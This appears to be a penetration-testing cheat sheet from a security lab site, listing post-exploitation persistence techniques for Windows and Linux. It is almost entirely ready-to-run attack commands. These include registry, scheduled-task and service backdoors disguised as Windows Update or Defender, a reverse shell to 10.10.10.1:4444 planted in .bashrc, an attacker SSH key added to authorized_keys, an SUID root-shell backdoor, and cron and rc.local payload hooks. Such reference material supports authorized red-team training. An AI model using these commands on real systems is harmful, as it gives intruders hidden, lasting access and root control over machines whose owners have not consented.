⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Persistence Mechanisms
WINDOWS
LINUX
# WINDOWS PERSISTENCE
# 1. Registry Run Keys (survives reboot, runs as user)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\Users\ram\AppData\Roaming\payload.exe"
# HKLM version requires admin:
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHelper" /t REG_SZ /d "C:\Windows\System32\payload.exe"
# 2. Scheduled Task (survives reboot, can run as SYSTEM)
schtasks /create /tn "WindowsUpdate" /tr "C:\temp\payload.exe" /sc ONLOGON /ru SYSTEM
schtasks /create /tn "SecurityScan" /tr "powershell -WindowStyle Hidden -File C:\temp\p.ps1" /sc MINUTE /mo 30
# 3. Windows Service
sc create "WindowsDefenderHelper" binPath= "C:\temp\payload.exe" start= auto
sc start "WindowsDefenderHelper"
# 4. Startup Folder
copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
# 5. WMI Event Subscription (stealthy — no files on disk)
$filter = Set-WMIInstance -Class __EventFilter -Namespace root\subscription ...
# See full: github.com/mattifestation/WMIBackdoor
# 6. DLL Hijacking persistence
# Drop malicious DLL in app directory — loaded on every app start
# LINUX PERSISTENCE
# 1. Cron job
echo "* * * * * root /tmp/.hidden/payload.sh" >> /etc/crontab
# Or user cron:
(crontab -l; echo "*/5 * * * * /tmp/.shell") | crontab -
# 2. .bashrc / .bash_profile (runs on every login)
echo "bash -i >& /dev/tcp/10.10.10.1/4444 0>&1" >> ~/.bashrc
# 3. SSH authorized_keys (permanent key access)
mkdir -p ~/.ssh && echo "ssh-rsa AAAAB3Nza...ATTACKER_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# 4. SUID backdoor
cp /bin/bash /tmp/.bash_suid
chmod +s /tmp/.bash_suid
# Run: /tmp/.bash_suid -p → root shell
# 5. /etc/rc.local (runs at boot as root)
echo "/tmp/payload &" >> /etc/rc.local